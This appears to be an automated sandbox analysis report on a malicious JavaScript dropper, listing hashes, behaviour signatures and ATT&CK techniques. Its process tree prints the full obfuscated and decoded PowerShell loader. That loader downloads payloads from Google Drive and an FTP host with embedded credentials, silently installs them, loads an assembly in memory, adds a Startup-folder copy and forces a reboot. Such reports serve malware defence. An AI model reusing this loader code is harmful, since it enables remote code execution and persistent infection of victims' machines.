6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1

General

Target

6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js
Size

11KB
MD5

e1c347b8f89a739b8ac859399fc5dd2f
SHA1

5ca91197785030f2072ed083b456e544d39b5ce3
SHA256

6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1
SHA512

d259433ba8a8f61c3909243630b94ff1ae32ee833858375d350a08ef99f6bedb1434116de9bc56293ae7fbc60249eba21be871cb35ff50d73d684eec9a535b0a
SSDEEP

192:QuJSWVs9A/4AzIZgROnqoM2CIi3UooDGcCLcYa6iNrpaNfbc1NgNd+tchvtk7alH:7sUVzywNoMNI+oyHcY4hpaVc7gmtc9lH

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2624	powershell.exe
1996	powershell.exe
2852	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1996	powershell.exe
2852	powershell.exe
2912	powershell.exe
2624	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2392 wrote to memory of 1996	2392	wscript.exe	31
PID 2392 wrote to memory of 1996	2392	wscript.exe	31
PID 2392 wrote to memory of 1996	2392	wscript.exe	31
PID 1996 wrote to memory of 2852	1996	powershell.exe	33
PID 1996 wrote to memory of 2852	1996	powershell.exe	33
PID 1996 wrote to memory of 2852	1996	powershell.exe	33
PID 2852 wrote to memory of 2912	2852	powershell.exe	34
PID 2852 wrote to memory of 2912	2852	powershell.exe	34
PID 2852 wrote to memory of 2912	2852	powershell.exe	34
PID 2912 wrote to memory of 2540	2912	powershell.exe	35
PID 2912 wrote to memory of 2540	2912	powershell.exe	35
PID 2912 wrote to memory of 2540	2912	powershell.exe	35
PID 2852 wrote to memory of 2624	2852	powershell.exe	36
PID 2852 wrote to memory of 2624	2852	powershell.exe	36
PID 2852 wrote to memory of 2624	2852	powershell.exe	36

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nbgdE = 'JA㍿lAEgASg㍿jAGsAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsASQ㍿mACAAKAAgACQAZQ㍿IAEoAYw㍿rACAAKQAgAHsAJA㍿NAGoATA㍿qAHAAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AGQAZQ㍿sACAAKAAkAE0Aag㍿MAGoAcAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsAJA㍿zAGkAVg㍿wAFAAIAA9ACAAJw㍿oAHQAdA㍿wAHMAOgAvAC8AZA㍿yAGkAdg㍿lAC4AZw㍿vAG8AZw㍿sAGUALg㍿jAG8AbQAvAHUAYwA/AGUAeA㍿wAG8Acg㍿0AD0AZA㍿vAHcAbg㍿sAG8AYQ㍿kACYAaQ㍿kAD0AJwA7ACQAUQ㍿EAGYARw㍿vACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsAaQ㍿mACAAKAAgACQAUQ㍿EAGYARw㍿vACAAKQAgAHsAJA㍿zAGkAVg㍿wAFAAIAA9ACAAKAAkAHMAaQ㍿WAHAAUAAgACsAIAAnAFcAMQAxADIAQQ㍿kAFAAZg㍿JADAAUA㍿DADcAaA㍿iAHMAYw㍿pAF8ANQ㍿fADAAXw㍿lAFUANw㍿OAHcATQ㍿aAGgAZgA0AHgAJwApACAAOw㍿9AGUAbA㍿zAGUAIA㍿7ACQAcw㍿pAFYAcA㍿QACAAPQAgACgAJA㍿zAGkAVg㍿wAFAAIAArACAAJwAxAGIAcg㍿qADUAag㍿xAG4AcQ㍿SAHgAQw㍿EADYAVg㍿oAGYAaA㍿㍿AG4AMg㍿yAGMAVg㍿mAHMAUg㍿vADcARAA4AGcAcgAnACkAIAA7AH0AOwAkAE4AeQ㍿CAFkAYwAgAD0AIAAoACAATg㍿lAHcALQ㍿PAGIAag㍿lAGMAdAAgAE4AZQ㍿0AC4AVw㍿lAGIAQw㍿sAGkAZQ㍿uAHQAIAApACAAOwAkAE4AeQ㍿CAFkAYwAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ACAAOwAkAE4AeQ㍿CAFkAYwAuAEQAbw㍿3AG4AbA㍿vAGEAZA㍿GAGkAbA㍿lACgAJA㍿VAFIATA㍿LAEIALAAgACQATQ㍿qAEwAag㍿wACAAKwAgACcAXA㍿VAHAAdw㍿pAG4ALg㍿tAHMAdQAnACkAIAA7ACQAQQ㍿VAHIARw㍿GACAAPQAgACgAIAAnAEMAOg㍿cAFUAcw㍿lAHIAcw㍿cACcAIAArACAAWw㍿FAG4Adg㍿pAHIAbw㍿uAG0AZQ㍿uAHQAXQA6ADoAVQ㍿zAGUAcg㍿OAGEAbQ㍿lACAAKQA7AEkAeg㍿qAEEAUQAgAD0AIAAoACAAJA㍿NAGoATA㍿qAHAAIAArACAAJw㍿cAFUAcA㍿3AGkAbgAuAG0Acw㍿1ACcAIAApACAAOwAgAHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAHcAdQ㍿zAGEALg㍿lAHgAZQAgAEkAeg㍿qAEEAUQAgAC8AcQ㍿1AGkAZQ㍿0ACAALw㍿uAG8Acg㍿lAHMAdA㍿hAHIAdAAgADsAIA㍿DAG8AcA㍿5AC0ASQ㍿0AGUAbQAgACcAJQ㍿EAEMAUA㍿KAFUAJQAnACAALQ㍿EAGUAcw㍿0AGkAbg㍿hAHQAaQ㍿vAG4AIAAoACAAJA㍿㍿AFUAcg㍿HAEYAIAArACAAJw㍿cAEEAcA㍿wAEQAYQ㍿0AGEAXA㍿SAG8AYQ㍿tAGkAbg㍿nAFwATQ㍿pAGMAcg㍿vAHMAbw㍿mAHQAXA㍿XAGkAbg㍿kAG8Adw㍿zAFwAUw㍿0AGEAcg㍿0ACAATQ㍿lAG4AdQ㍿cAFAAcg㍿vAGcAcg㍿hAG0Acw㍿cAFMAdA㍿hAHIAdA㍿1AHAAJwAgACkAIAAtAGYAbw㍿yAGMAZQAgADsAcA㍿vAHcAZQ㍿yAHMAaA㍿lAGwAbAAuAGUAeA㍿lACAALQ㍿jAG8AbQ㍿tAGEAbg㍿kACAAJw㍿zAGwAZQ㍿lAHAAIAAxADgAMAAnADsAIA㍿zAGgAdQ㍿0AGQAbw㍿3AG4ALg㍿lAHgAZQAgAC8AcgAgAC8AdAAgADAAIAAvAGYAIA㍿9AGUAbA㍿zAGUAIA㍿7AFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿yAHYAaQ㍿jAGUAUA㍿vAGkAbg㍿0AE0AYQ㍿uAGEAZw㍿lAHIAXQA6ADoAUw㍿lAHIAdg㍿lAHIAQw㍿lAHIAdA㍿pAGYAaQ㍿jAGEAdA㍿lAFYAYQ㍿sAGkAZA㍿hAHQAaQ㍿vAG4AQw㍿hAGwAbA㍿iAGEAYw㍿rACAAPQAgAHsAJA㍿0AHIAdQ㍿lAH0AOw㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAcg㍿2AGkAYw㍿lAFAAbw㍿pAG4AdA㍿NAGEAbg㍿hAGcAZQ㍿yAF0AOgA6AFMAZQ㍿jAHUAcg㍿pAHQAeQ㍿QAHIAbw㍿0AG8AYw㍿vAGwAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAGMAdQ㍿yAGkAdA㍿5AFAAcg㍿vAHQAbw㍿jAG8AbA㍿UAHkAcA㍿lAF0AOgA6AFQAbA㍿zADEAMgA7ACQAZg㍿nAEgAWQ㍿LACAAPQAgACgATg㍿lAHcALQ㍿PAGIAag㍿lAGMAdAAgAE4AZQ㍿0AC4AVw㍿lAGIAQw㍿sAGkAZQ㍿uAHQAKQA7ACQAZg㍿nAEgAWQ㍿LAC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿UAGUAeA㍿0AC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nAF0AOgA6AFUAVA㍿GADgAOwAkAGYAZw㍿IAFkASwAuAEMAcg㍿lAGQAZQ㍿uAHQAaQ㍿hAGwAcwAgAD0AIA㍿uAGUAdwAtAG8AYg㍿qAGUAYw㍿0ACAAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAE4AZQ㍿0AHcAbw㍿yAGsAQw㍿yAGUAZA㍿lAG4AdA㍿pAGEAbAAoACcAZA㍿lAHMAYw㍿rAHYAYg㍿yAGEAdAAxACcALAAnAGQAZQ㍿2AGUAbA㍿vAHAAZQ㍿yAHAAcg㍿vADIAMQA1ADcAOA㍿KAHAAQA㍿AACcAKQA7ACQAeA㍿NAEEAbQ㍿KACAAPQAgACQAZg㍿nAEgAWQ㍿LAC4ARA㍿vAHcAbg㍿sAG8AYQ㍿kAFMAdA㍿yAGkAbg㍿nACgAIAAnAGYAdA㍿wADoALwAvAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQAMQ㍿AAGYAdA㍿wAC4AZA㍿lAHMAYw㍿rAHYAYg㍿yAGEAdAAuAGMAbw㍿tAC4AYg㍿yAC8AVQ㍿wAGMAcg㍿5AHAAdA㍿lAHIALwAwADIALw㍿EAEwATAAwADEALg㍿0AHgAdAAnACAAKQA7ACQAZg㍿nAEgAWQ㍿LAC4AZA㍿pAHMAcA㍿vAHMAZQAoACkAOwAkAGYAZw㍿IAFkASwAgAD0AIAAoAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACkAOwAkAGYAZw㍿IAFkASwAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ADsAJA㍿4AE0AQQ㍿tAEoAIAA9ACAAJA㍿mAGcASA㍿ZAEsALg㍿EAG8Adw㍿uAGwAbw㍿hAGQAUw㍿0AHIAaQ㍿uAGcAKAAgACQAeA㍿NAEEAbQ㍿KACAAKQA7AFsAQg㍿5AHQAZQ㍿bAF0AXQAgACQAUg㍿YAGkAVg㍿qAF8AWQ㍿sAHQASA㍿LACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿DAG8Abg㍿2AGUAcg㍿0AF0AOgA6AEYAcg㍿vAG0AQg㍿hAHMAZQA2ADQAUw㍿0AHIAaQ㍿uAGcAKAAgACQAeA㍿NAEEAbQ㍿KAC4AUg㍿lAHAAbA㍿hAGMAZQAoACAAJwCTIToAkyEnACAALAAgACcAQQAnACAAKQAgACkAOw㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQQ㍿wAHAARA㍿vAG0AYQ㍿pAG4AXQA6ADoAQw㍿1AHIAcg㍿lAG4AdA㍿EAG8AbQ㍿hAGkAbgAuAEwAbw㍿hAGQAKAAgACQAUg㍿YAGkAVg㍿qAF8AWQ㍿sAHQASA㍿LACAAKQAuAEcAZQ㍿0AFQAeQ㍿wAGUAKAAgACcAQw㍿sAGEAcw㍿zAEwAaQ㍿iAHIAYQ㍿yAHkAMwAuAEMAbA㍿hAHMAcwAxACcAIAApAC4ARw㍿lAHQATQ㍿lAHQAaA㍿vAGQAKAAgACcAcA㍿yAEYAVg㍿JACcAIAApAC4ASQ㍿uAHYAbw㍿rAGUAKAAkAG4AdQ㍿sAGwALAAgAFsAbw㍿iAGoAZQ㍿jAHQAWw㍿dAF0AIAAoACAAJwAwAC8AUA㍿XAE0ARQ㍿0AC8AZAAvAGUAZQAuAGUAdA㍿zAGEAcAAvAC8AOg㍿zAHAAdA㍿0AGgAJwAgACwAIAAnACUARA㍿DAFAASg㍿VACUAJwAsACAAJw㍿GAGEAbA㍿zAGUAJwAgACkAIAApADsAfQA7AA==';$nbgdE = $nbgdE.replace('㍿','B') ;$nbgdE = [System.Convert]::FromBase64String( $nbgdE ) ;;;$nbgdE = [System.Text.Encoding]::Unicode.GetString( $nbgdE ) ;$nbgdE = $nbgdE.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js') ;powershell $nbgdE
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$eHJck = $host.Version.Major.Equals(2);If ( $eHJck ) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $QDfGo ) {$siVpP = ($siVpP + 'W112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$NyBYc = ( New-Object Net.WebClient ) ;$NyBYc.Encoding = [System.Text.Encoding]::UTF8 ;$NyBYc.DownloadFile($URLKB, $MjLjp + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MjLjp + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$fgHYK = (New-Object Net.WebClient);$fgHYK.Encoding = [System.Text.Encoding]::UTF8;$fgHYK.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$xMAmJ = $fgHYK.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$fgHYK.dispose();$fgHYK = (New-Object Net.WebClient);$fgHYK.Encoding = [System.Text.Encoding]::UTF8;$xMAmJ = $fgHYK.DownloadString( $xMAmJ );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $xMAmJ.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '0/PWMEt/d/ee.etsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js', 'False' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe IzjAQ /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2912
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" IzjAQ /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\187MJUVCTMJP3PN0M5TS.temp

Filesize
7KB

MD5
c9c3a2b2557495712c4006bf87e0f9b9

SHA1
e3d1b732480c1b1c27764fa2d9fe9c341f911dad

SHA256
15d20d5d12f36f6bed041cb2974d5c731758dd3ae7637977e15ee44110463ce7

SHA512
a3457d3a3348ab88f04cc9453f6f017a369a1cdd455efa44107cc3cf925e945ea92bfa83c283b287839b5831f642509a36c293aef694f06620a2745b982c30ab

Download Submit
memory/1996-4-0x000007FEF515E000-0x000007FEF515F000-memory.dmp

Filesize
4KB

Download
memory/1996-5-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/1996-7-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

Filesize
9.6MB

Download
memory/1996-6-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/1996-9-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

Filesize
9.6MB

Download
memory/1996-8-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

Filesize
9.6MB

Download
memory/1996-10-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

Filesize
9.6MB

Download
memory/1996-28-0x000007FEF515E000-0x000007FEF515F000-memory.dmp

Filesize
4KB

Download
memory/1996-29-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing